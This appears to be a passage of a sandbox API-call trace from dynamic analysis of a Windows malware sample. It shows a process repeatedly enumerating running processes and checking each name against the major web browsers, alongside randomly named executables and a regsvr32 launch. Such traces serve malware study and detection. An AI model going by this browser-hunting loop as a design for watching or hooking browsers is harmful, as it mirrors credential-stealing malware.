(lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0170.264] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0170.264] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.264] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0170.264] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0170.265] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0170.265] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0170.265] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0170.265] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.265] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0170.265] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0170.265] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0170.265] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0170.265] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0170.265] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.265] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0170.266] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0170.266] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0170.266] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0170.266] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0170.266] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.266] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0170.266] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0170.266] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0170.266] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0170.266] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0170.266] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.266] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0170.267] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0170.267] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0170.267] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0170.267] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0170.267] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.267] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.267] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.267] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.268] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.268] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0170.268] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.268] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0170.268] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0170.268] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0170.268] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0170.268] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0170.268] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.268] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.269] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.269] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.269] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.269] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0170.269] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.269] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0170.269] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0170.269] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0170.269] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0170.269] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0170.269] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.269] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0170.270] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0170.270] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0170.270] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0170.270] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0170.270] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.270] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.270] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0170.271] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0170.271] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0170.271] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0170.271] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.271] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0170.271] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0170.271] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0170.271] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0170.271] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0170.271] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.271] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0170.272] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0170.272] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0170.272] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0170.272] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0170.272] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.272] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.272] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0170.272] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0170.272] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0170.272] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0170.272] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.272] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.273] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0170.273] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0170.273] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0170.273] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0170.273] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.273] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.273] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0170.274] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0170.274] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0170.274] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0170.274] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.274] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0170.274] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0170.274] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0170.274] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0170.274] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0170.274] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0170.274] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0170.275] lstrcmpiA (lpString1="regsvr32.exe", lpString2="firefox.exe") returned 1 [0170.275] lstrcmpiA (lpString1="regsvr32.exe", lpString2="iexplore.exe") returned 1 [0170.275] lstrcmpiA (lpString1="regsvr32.exe", lpString2="chrome.exe") returned 1 [0170.275] lstrcmpiA (lpString1="regsvr32.exe", lpString2="opera.exe") returned 1 [0170.275] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0170.275] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0170.275] CloseHandle (hObject=0xe8) returned 1 [0170.275] Sleep (dwMilliseconds=0x3e8) [0171.298] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0171.300] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0171.300] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0171.300] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0171.300] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0171.300] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0171.300] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0171.300] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0171.301] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0171.301] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0171.301] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0171.301] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0171.301] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0171.301] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0171.301] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0171.301] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0171.301] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0171.302] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0171.302] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.302] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0171.302] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0171.302] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0171.302] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0171.302] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0171.302] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.302] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0171.303] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0171.303] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0171.303] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0171.303] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0171.303] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.303] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0171.304] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0171.304] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0171.304] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0171.304] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0171.304] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.304] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0171.304] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0171.304] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0171.304] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0171.304] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0171.304] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.304] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0171.305] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0171.305] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0171.305] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0171.305] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0171.305] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.305] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0171.305] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0171.305] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0171.305] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0171.305] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0171.305] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.305] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0171.306] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0171.306] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0171.306] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0171.306] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0171.306] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.306] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.307] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.307] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.307] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.307] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0171.307] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.307] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.307] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.307] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.307] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.307] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0171.307] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.307] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.308] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.308] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.308] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.308] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0171.308] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.308] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.308] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.308] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.308] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.308] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0171.308] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.308] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.309] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.309] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.309] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.309] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0171.309] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.309] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0171.310] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0171.310] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0171.310] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0171.310] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0171.310] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0171.310] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.310] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.310] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.310] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.310] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0171.310] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.310] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0171.311] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0171.311] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0171.311] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0171.311] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0171.311] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0171.311] 